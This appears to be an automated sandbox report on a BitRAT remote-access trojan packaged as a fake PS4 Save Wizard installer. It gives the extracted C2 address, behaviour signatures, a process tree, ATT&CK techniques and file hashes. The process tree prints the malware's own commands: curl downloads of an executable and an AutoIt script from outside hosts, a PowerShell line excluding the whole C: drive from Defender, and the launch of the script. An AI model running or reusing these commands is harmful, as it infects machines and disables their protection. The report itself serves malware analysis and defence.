Analysis

  • max time kernel
    4265097s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    16-01-2022 19:21

General

  • Target

    8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e.msi

  • Size

    2.1MB

  • MD5

    2db9ee63581f0297d8ca118850685602

  • SHA1

    244c7008be6f767f0f31a341fe0e70fa2e9a5399

  • SHA256

    8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e

  • SHA512

    58cf0bdfe777ffcb01f9795d859f2daa9cb77d7587d1f054d8f5a0d456289d36e3c155fa6d6f5f4d47ef742a7038c3fa98b27093d6394e5db31cb5854ff5c8ff

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

idegasbre.ddns.net:1312

Attributes
  • communication_password

    61bf8edd6e339f90f18f7860fe4c0939

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 21 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2020
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:816
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:2560
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding DAD3EE74573D7488791138954435E738
        2⤵
        • Loads dropped DLL
        PID:2808
      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe
        "C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe"
        2⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3756
        • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe
          "C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe"
          3⤵
          • Executes dropped EXE
          • Drops startup file
          • Modifies data under HKEY_USERS
          • Modifies system certificate store
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output C:\ProgramData\EdgeData\AutoIt3.exe | clip
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2132
            • C:\Windows\system32\curl.exe
              curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output C:\ProgramData\EdgeData\AutoIt3.exe
              5⤵
                PID:3164
              • C:\Windows\system32\clip.exe
                clip
                5⤵
                  PID:3588
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output AutoIt3.exe | clip
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1844
                • C:\Windows\system32\curl.exe
                  curl https://cdn.discordapp.com/attachments/531227037579345940/914273423725846578/AutoIt3.exe --output AutoIt3.exe
                  5⤵
                    PID:3412
                  • C:\Windows\system32\clip.exe
                    clip
                    5⤵
                      PID:3788
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c curl https://sincheats.com/gas/run.au3 --output run.au3 | clip
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3704
                    • C:\Windows\system32\curl.exe
                      curl https://sincheats.com/gas/run.au3 --output run.au3
                      5⤵
                        PID:3476
                      • C:\Windows\system32\clip.exe
                        clip
                        5⤵
                          PID:1392
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c curl https://sincheats.com/gas/run.au3 --output C:\ProgramData\EdgeData\run.au3 | clip
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:736
                        • C:\Windows\system32\curl.exe
                          curl https://sincheats.com/gas/run.au3 --output C:\ProgramData\EdgeData\run.au3
                          5⤵
                            PID:2496
                          • C:\Windows\system32\clip.exe
                            clip
                            5⤵
                              PID:3880
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\
                            4⤵
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2608
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c start AutoIt3.exe run.au3 | clip
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2140
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" start AutoIt3.exe run.au3 "
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3892
                              • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
                                AutoIt3.exe run.au3
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                • Suspicious use of WriteProcessMemory
                                PID:3288
                                • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
                                  "C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of SetWindowsHookEx
                                  PID:372
                            • C:\Windows\system32\clip.exe
                              clip
                              5⤵
                                PID:2020
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D643.ps1 -paths 'C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard','C:\Users\Admin\AppData\Roaming\SaveWiz inc','C:\Users\Admin\AppData\Roaming\SaveWiz inc' -retry_count 10"
                            3⤵
                            • Blocklisted process makes network request
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3708
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Checks SCSI registry key(s)
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3404
                      • C:\Windows\system32\MusNotification.exe
                        C:\Windows\system32\MusNotification.exe
                        1⤵
                        • Checks processor information in registry
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1368

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Defense Evasion

                      Install Root Certificate

                      1
                      T1130

                      Modify Registry

                      1
                      T1112

                      Discovery

                      Query Registry

                      3
                      T1012

                      Peripheral Device Discovery

                      2
                      T1120

                      System Information Discovery

                      4
                      T1082

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        MD5

                        a8e8360d573a4ff072dcc6f09d992c88

                        SHA1

                        3446774433ceaf0b400073914facab11b98b6807

                        SHA256

                        bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

                        SHA512

                        4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

                      • C:\Users\Admin\AppData\Local\Temp\AI_D643.ps1
                        MD5

                        31e1ff54955cedd19c6e6932f10f7c55

                        SHA1

                        0b45e8fc0fb965d2a98ac1be82a3cbbe19fbd0f8

                        SHA256

                        4ceb0eb297d9c6b2815b953b584a134838417a3db6691bcfc4d015f537e758fd

                        SHA512

                        cb339d3409ec87dd70824d9b5b03d3b8b1ecb45af74090305e1c078daee9dca02fbcd53e014ac410eab8d4aa6177821405e6c138a2efec2940aa645c4d970ce9

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
                        MD5

                        c56b5f0201a3b3de53e561fe76912bfd

                        SHA1

                        2a4062e10a5de813f5688221dbeb3f3ff33eb417

                        SHA256

                        237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                        SHA512

                        195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
                        MD5

                        c56b5f0201a3b3de53e561fe76912bfd

                        SHA1

                        2a4062e10a5de813f5688221dbeb3f3ff33eb417

                        SHA256

                        237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                        SHA512

                        195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\AutoIt3.exe
                        MD5

                        c56b5f0201a3b3de53e561fe76912bfd

                        SHA1

                        2a4062e10a5de813f5688221dbeb3f3ff33eb417

                        SHA256

                        237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                        SHA512

                        195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.dll
                        MD5

                        897ca0836df7450082a666c3eb54884f

                        SHA1

                        993c06e824b158cd2df52283f3b2784b28089d36

                        SHA256

                        24748afdd647bcf3be291910d88d8b8b79062fa0af9700d00bfd724af88a77cc

                        SHA512

                        647e6881e1b7acc4c53459fe780651d39a1016ef1c59da82cd469768b77f2064da329ed703d0548b12811cd8147e7febd5487d384ce0a967f9242d01cb0584b2

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe
                        MD5

                        a42fe5f4d4d30da09a31b721bdc006a7

                        SHA1

                        b24636539fe1758501ba0f30da92f2c1f24ecf38

                        SHA256

                        0fc80fb8e0dbc50e338127f17b0a31f521a6c0a220620e7e71ac71efc0c7cb61

                        SHA512

                        d1aeead8f9cfe0ff190b04420e792fd1a75216cfafe624725768a25f8125754de2f20bfb9bb79d6dcd69a72bbb1d2a904f479bdf1faf8acb77536ca29286f2fc

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe
                        MD5

                        a42fe5f4d4d30da09a31b721bdc006a7

                        SHA1

                        b24636539fe1758501ba0f30da92f2c1f24ecf38

                        SHA256

                        0fc80fb8e0dbc50e338127f17b0a31f521a6c0a220620e7e71ac71efc0c7cb61

                        SHA512

                        d1aeead8f9cfe0ff190b04420e792fd1a75216cfafe624725768a25f8125754de2f20bfb9bb79d6dcd69a72bbb1d2a904f479bdf1faf8acb77536ca29286f2fc

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\PS4SAVEWIZARD\PS4SAVEWIZARD.exe.manifest
                        MD5

                        40d927f29252eb0fbc5e22ad85852605

                        SHA1

                        244a4dec6e31f750b131d5e4ab149d904077c405

                        SHA256

                        051a061730819ebe2b9fd8e74fb326cc27526893eb78e690dd97d7068996aee7

                        SHA512

                        621336201fd15aee2982f48aef77394c5cbef442dfdc4edbd7f71bccf8bce79b5725e824bacace59bdf5c41f55325744de5670d8f3cb81cd04e7a2485942c3f7

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.exe
                        MD5

                        3563ae6b46b899129a49428aae61e1d4

                        SHA1

                        877868a1cd7799b17ef64c3c8282cd6d4b077cc9

                        SHA256

                        b8607c4530a0b895aec9e9c29c64c0f370f446dc2eb7541ce1b331cd915a2529

                        SHA512

                        6b95ad08cb74368d9ada95a7b5aab996eaa3b2b034c1354c1d171c8c32c7e491eec9bb33aebdf4ef66d0b6a666a744256443b7e7c339e7cf144167b906180b79

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\aipackagechainer.ini
                        MD5

                        5184e09f08ecc2dbe4d2fd67630d9e4c

                        SHA1

                        5dde097a9170e11dce489342a801b39a621aaa8e

                        SHA256

                        0363d05c0b31c3df1bee879a40e8d9315608b5263f65c71e59b4e08b27d58373

                        SHA512

                        ccc6ccd46266a618760d180677e48187c0f072ba2c0252331fd73bd92999c74c2e66a0b268c8dab797c90fa52850d9c01a9516a72be5c5d9c28b83e4efa6f8f2

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\file_deleter.ps1
                        MD5

                        31e1ff54955cedd19c6e6932f10f7c55

                        SHA1

                        0b45e8fc0fb965d2a98ac1be82a3cbbe19fbd0f8

                        SHA256

                        4ceb0eb297d9c6b2815b953b584a134838417a3db6691bcfc4d015f537e758fd

                        SHA512

                        cb339d3409ec87dd70824d9b5b03d3b8b1ecb45af74090305e1c078daee9dca02fbcd53e014ac410eab8d4aa6177821405e6c138a2efec2940aa645c4d970ce9

                      • C:\Users\Admin\AppData\Roaming\SaveWiz inc\Save Wizard\prerequisites\run.au3
                        MD5

                        8d477c9acd79e3ff56dd24b31a28c096

                        SHA1

                        a71ebfa20983903a7f7839e6d9b35e81ff708805

                        SHA256

                        0eda4096a4d53f4d0453551c6ea79222f81c0dc7b2985b01db5ef50dbc752ff1

                        SHA512

                        97d8b1974ed7b999e758605b1f02dcf6dda36447bad094ba4c442bdd82e3d2a8694d06d2d8d52650a3ef50c1342e8efb7394e6159faf95204dc6fb88509b09da

                      • C:\Windows\Installer\MSI3D7D.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI3D7D.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI40CA.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI40CA.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI4186.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI4186.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI4204.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI4204.tmp
                        MD5

                        0981d5c068a9c33f4e8110f81ffbb92e

                        SHA1

                        badb871adf6f24aba6923b9b21b211cea2aeca77

                        SHA256

                        b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                        SHA512

                        59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                      • C:\Windows\Installer\MSI42A2.tmp
                        MD5

                        5f1b243813a203c66ba735139d8ce0c7

                        SHA1

                        c60a57668d348a61e4e2f12115afb9f9024162ba

                        SHA256

                        52d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2

                        SHA512

                        083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5

                      • C:\Windows\Installer\MSI42A2.tmp
                        MD5

                        5f1b243813a203c66ba735139d8ce0c7

                        SHA1

                        c60a57668d348a61e4e2f12115afb9f9024162ba

                        SHA256

                        52d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2

                        SHA512

                        083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5

                      • C:\Windows\Installer\MSI44C7.tmp
                        MD5

                        5f1b243813a203c66ba735139d8ce0c7

                        SHA1

                        c60a57668d348a61e4e2f12115afb9f9024162ba

                        SHA256

                        52d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2

                        SHA512

                        083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5

                      • C:\Windows\Installer\MSI44C7.tmp
                        MD5

                        5f1b243813a203c66ba735139d8ce0c7

                        SHA1

                        c60a57668d348a61e4e2f12115afb9f9024162ba

                        SHA256

                        52d5b228221cd5276e4ee2a038e0ce0cf494d5af9c23ac45dcbfadc3115c8cb2

                        SHA512

                        083c6d1af44847db4b6fb90349234128141a838d1d438d5c24f5063539a8087f0814d06cfa162aeace20e162292f64c7635b4a0e81b2ca972706cfbc484adfb5

                      • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                        MD5

                        f84c6fde6630e754ec87fa43182480b4

                        SHA1

                        4619a71bbf33952217be7bdea5752c88ed035058

                        SHA256

                        c7eebc9dedacb2e6249a38c444def35977015eb9509d5626cae8e3a96a375714

                        SHA512

                        050807dd5fd200d35e72a77e94f21c3dabf20aabc41afecad0a15b51f58a2e7d0731f97472c38fd4cd7ab08633988c12d587facf60fb78da8204b44ce25c9091

                      • \??\Volume{018d5b2b-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{6eb068a2-870e-4dff-9677-2f2aaf7b57ed}_OnDiskSnapshotProp
                        MD5

                        dc7f01b8993dc8f3677a49982d6e4080

                        SHA1

                        80a614166262c6c4f821db7de199133e4901df59

                        SHA256

                        3e75f75251d9ad7b016a5319e5ebd61cdf5be442a4157cf82e5467f7297dfed8

                        SHA512

                        1b72de1655446fdb8a7e2c5b251f2c78ba0e5c7fe9751d0e53a39779184907121c70a256b48671e27bd169af59da7a6f7846feab3f3b8435429865b52d9a4eea

                      • memory/372-192-0x0000000000000000-mapping.dmp
                      • memory/372-193-0x0000000001270000-0x000000000163E000-memory.dmp
                        Filesize

                        3.8MB

                      • memory/372-196-0x0000000001270000-0x000000000163E000-memory.dmp
                        Filesize

                        3.8MB

                      • memory/736-169-0x0000000000000000-mapping.dmp
                      • memory/816-132-0x000001DFB7310000-0x000001DFB7312000-memory.dmp
                        Filesize

                        8KB

                      • memory/816-133-0x000001DFB7310000-0x000001DFB7312000-memory.dmp
                        Filesize

                        8KB

                      • memory/1392-166-0x0000000000000000-mapping.dmp
                      • memory/1844-161-0x0000000000000000-mapping.dmp
                      • memory/2020-189-0x0000000000000000-mapping.dmp
                      • memory/2020-130-0x00000226D9B30000-0x00000226D9B32000-memory.dmp
                        Filesize

                        8KB

                      • memory/2020-131-0x00000226D9B30000-0x00000226D9B32000-memory.dmp
                        Filesize

                        8KB

                      • memory/2132-158-0x0000000000000000-mapping.dmp
                      • memory/2140-187-0x0000000000000000-mapping.dmp
                      • memory/2496-170-0x0000000000000000-mapping.dmp
                      • memory/2560-134-0x0000000000000000-mapping.dmp
                      • memory/2608-183-0x000002170C9F0000-0x000002170C9F2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-179-0x000002170C9F0000-0x000002170C9F2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-181-0x000002170CB43000-0x000002170CB45000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-175-0x000002170C9F0000-0x000002170C9F2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-176-0x000002170C9F0000-0x000002170C9F2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-177-0x000002170E4C0000-0x000002170E4E2000-memory.dmp
                        Filesize

                        136KB

                      • memory/2608-178-0x000002170C9F0000-0x000002170C9F2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-186-0x000002170CB48000-0x000002170CB49000-memory.dmp
                        Filesize

                        4KB

                      • memory/2608-180-0x000002170CB40000-0x000002170CB42000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-172-0x0000000000000000-mapping.dmp
                      • memory/2608-173-0x000002170C9F0000-0x000002170C9F2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-174-0x000002170C9F0000-0x000002170C9F2000-memory.dmp
                        Filesize

                        8KB

                      • memory/2608-182-0x000002170CB46000-0x000002170CB48000-memory.dmp
                        Filesize

                        8KB

                      • memory/2796-153-0x0000000000000000-mapping.dmp
                      • memory/2808-136-0x00000000005D0000-0x00000000005D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2808-135-0x0000000000000000-mapping.dmp
                      • memory/2808-137-0x00000000005D0000-0x00000000005D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3164-159-0x0000000000000000-mapping.dmp
                      • memory/3288-190-0x0000000000000000-mapping.dmp
                      • memory/3412-162-0x0000000000000000-mapping.dmp
                      • memory/3476-165-0x0000000000000000-mapping.dmp
                      • memory/3588-160-0x0000000000000000-mapping.dmp
                      • memory/3704-164-0x0000000000000000-mapping.dmp
                      • memory/3708-201-0x0000000005310000-0x0000000005311000-memory.dmp
                        Filesize

                        4KB

                      • memory/3708-204-0x0000000008210000-0x0000000008232000-memory.dmp
                        Filesize

                        136KB

                      • memory/3708-197-0x0000000000000000-mapping.dmp
                      • memory/3708-198-0x0000000005290000-0x0000000005291000-memory.dmp
                        Filesize

                        4KB

                      • memory/3708-199-0x0000000005290000-0x0000000005291000-memory.dmp
                        Filesize

                        4KB

                      • memory/3708-200-0x0000000007400000-0x0000000007436000-memory.dmp
                        Filesize

                        216KB

                      • memory/3708-211-0x0000000005290000-0x0000000005291000-memory.dmp
                        Filesize

                        4KB

                      • memory/3708-202-0x0000000007A70000-0x0000000008098000-memory.dmp
                        Filesize

                        6.2MB

                      • memory/3708-203-0x0000000005312000-0x0000000005313000-memory.dmp
                        Filesize

                        4KB

                      • memory/3708-210-0x0000000005315000-0x0000000005317000-memory.dmp
                        Filesize

                        8KB

                      • memory/3708-205-0x00000000082B0000-0x0000000008316000-memory.dmp
                        Filesize

                        408KB

                      • memory/3708-206-0x0000000008320000-0x0000000008386000-memory.dmp
                        Filesize

                        408KB

                      • memory/3708-208-0x0000000008990000-0x00000000089AE000-memory.dmp
                        Filesize

                        120KB

                      • memory/3756-150-0x0000000000000000-mapping.dmp
                      • memory/3788-163-0x0000000000000000-mapping.dmp
                      • memory/3880-171-0x0000000000000000-mapping.dmp
                      • memory/3892-188-0x0000000000000000-mapping.dmp